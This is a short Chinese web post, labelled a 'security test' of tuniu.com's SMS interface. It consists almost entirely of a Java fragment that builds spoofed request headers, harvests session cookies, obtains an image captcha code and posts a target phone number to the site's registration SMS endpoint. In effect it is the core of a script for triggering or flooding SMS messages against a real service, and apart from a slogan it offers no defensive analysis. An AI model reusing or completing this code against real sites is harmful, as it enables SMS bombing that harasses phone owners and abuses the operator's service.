安全測試 : 途牛旅游網(tuniu.com)網站短信接口安全測試
發(fā)布時間:2021-04-28 點擊數:3857
安全問題不容忽視,不要亡羊補牢!
//配置請求頭
inheads.put("Accept", "*/*");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Referer", "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect");
getCookie(cookieStore, httpclient, "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect", inheads, outheads);
String cookieStr = GetCookieHead.CookieHashToString(outheads);
if (cookieStr != null) {
inheads.put("Cookie", cookieStr);
}
//配置請求參數
List<BasicNameValuePair> paramsList = new ArrayList<BasicNameValuePair>();
paramsList.add(new BasicNameValuePair("tel", phone));
paramsList.add(new BasicNameValuePair("identify_code", input.get("imgCode")));
paramsList.add(new BasicNameValuePair("intlCode", "0086"));
paramsList.add(new BasicNameValuePair("isReg", "1"));
//配置請求
String imgCode = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input, outMap);
input.put("imgCode", imgCode != null ? imgCode : "");
retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);